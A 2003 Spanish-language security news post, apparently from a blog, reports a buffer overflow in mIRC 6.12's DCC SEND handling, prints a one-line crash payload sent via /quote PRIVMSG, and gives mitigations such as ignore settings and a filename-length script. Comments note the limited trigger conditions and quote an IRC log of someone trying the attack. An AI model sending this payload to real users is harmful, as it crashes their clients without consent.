El mirc vuelve a ser vulnerable

Octubre 27, 03 by admin

Ha salido una nueva vulnerabilidad en el mirc, la cual se encuentra en el DCC SEND, y puede ser aprovechada por un atacante remoto, al este provocar un "buffer overflow".
Hasta el momento se sabe que la vulnerabilidad permite un denial of service, pero no se descarta la posibilidad de que se pueda ejecutar codigo remotamente.
La version afectada es la "Khaled Mardam-Bey mIRC 6.12".

Esta es la forma de explotar la vulnerabilidad:

/quote PRIVMSG #mirc :^ADCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" 1363975063 3500 4^A

La forma de solucionar esta vulnerabilidad seria de las siguientes maneras:

Poniendo en el mirc "/ignore -d *" o "/ignore -wd *" con esto estariamos ignorando todas las request de DCC.

Otra forma es poner un script en la opción "mIRC remotes section":

ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) { echo 4 -s $nick tried to crash you with an illegal dcc send of $nopath($filename) | halt }

o

ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) halt

Add your comment

2 responses for this post

  1. anónimo Says:

    —–
    http://www.irchelp.org/irchelp/mirc/exploit.html

    On Oct 20, another exploit was identified which can crash even the recently released version 6.12. It only seems to affect people who minimize DCC get dialog windows (manually or by default), and then open those windows to get a file with an excessively long filename. You can’t be crashed unless that sequence of events occurs. That manual step is required. If you auto-get the file, or don’t get the file at all, nothing happens.
    —-

    Bueno, solo quisiera aclarar una cosa.. al leer esta noticia lo primero que he hecho es mirar de donde habia salido la fuente y leer el articulo completo y comprobar bien el funcionamiento del exploit.
    Agradeceria que se pusiera un link tipo "para mas informacion.." y pusiera de donde ha salido la noticia ya que seria de utilidad, y tb para que la gente que no tiene idea, no empieze a lanzar ataques a diestro y siniestro sin saber realmente como va la cosa.

    Tal y como pone en la web que anuncia dicho bug:

    Afecta a los usuarios que minimizen la ventana de recibir el archivo y luego la restauren para abrir el mismo, siendo este archivo con un nombre excesivamente largo.

    Solo en estas condiciones, por lo que los listillos que han visto el ataque y han empezado a intentar lanzarlo, que primero miren. Cita de ello:

    *** aksd entra (ident@Ctl285.CLzky4.virtual) [19:24]
    -
    DCC Send from aksd rejected (invalid parameters)
    -
    <CoDeX> ((aksd))
    <JeZuLY> || aksd || ke pretendes?
    <CoDeX> t vi a meter el bug
    <CrowDat> aksd eres tonto o eres tonto?
    <CoDeX> en el culo
    <CoDeX> xD
    <aksd> http://www.shellsec.net/noticias.php?num=286
    <aksd> :o
    <aksd> //part $chan :)
    *** aksd sale (ident@Ctl285.CLzky4.virtual) [19:25] :)
    ———-

    Saludos, CrowDat.

  2. Fernando Ortega Says:

    Efectivamente, el error se procuce _sólo_ cuando la ventana de diálogo de DCC se minimiza y luego se restaura para recibir el fichero.

    Normalmente solemos insertar links a direcciones relacionadas con la noticia, aunque esta vez se nos pasó.

    Al publicar una vulnerabilidad no buscamos que los usuarios intenten explotarla contra terceras personas, sino que la publicamos con fines informátivos, así como solemos exponer los métodos para solucionar dichas vulnerabilidades. No nos podemos responsabilizar del fin que le den otras personas ajenas a nuestro grupo.

    Gracias de nuevo por tu puntualización CrowDat, un saludo

Leave a Reply